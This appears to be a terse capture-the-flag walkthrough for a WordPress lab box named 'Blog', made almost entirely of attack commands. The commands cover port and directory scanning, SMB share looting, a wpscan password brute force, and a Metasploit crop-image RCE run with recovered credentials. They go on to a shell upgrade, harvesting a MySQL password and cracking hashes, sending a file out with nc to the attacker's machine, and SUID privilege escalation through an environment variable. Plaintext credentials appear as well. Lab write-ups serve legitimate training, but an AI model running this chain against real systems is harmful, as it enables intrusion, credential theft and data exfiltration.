Blog
Initial Scan
nmap -A $VICTIM

Scan all ports

TCP/80 - HTTP

TCP/445 - SMB




TCP/80 - HTTP






Initial Shell





Privilege Escalation




Last updated
nmap -A $VICTIM






















Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtsmbclient -L //$VICTIM/smbclient //$VICTIM/BillySMBsmbget -R smb://$VICTIM/BillySMBsteghide extract -sf check-this.png
cat rabbit_hole.txt wpscan --url http://blog.thm/ --enumerate uwpscan --url http://blog.thm/ -U kwheel, bjoel -P /usr/share/wordlists/rockyou.txtmsfconsole
use exploit/multi/http/wp_crop_rce
set rhosts $VICTIM
set username kwheel
set password cutiepie1
run
shell
python2 -c 'import pty; pty.spawn("/bin/bash")'
idgrep -i pass *mysql -u wordpressuser -p
Password: LittleYellowLamp90!@
show databases;
use blog;
show tables;
select * from wp_users;john hash.txt --wordlist=/usr/share/wordlists/rockyou.txtcd /home/bjoel
nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdfnc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdffind / -perm -u=s -type f 2> /dev/null cd /usr/sbin
ltrace checkerenv
export admin=admin
env
/usr/sbin/checker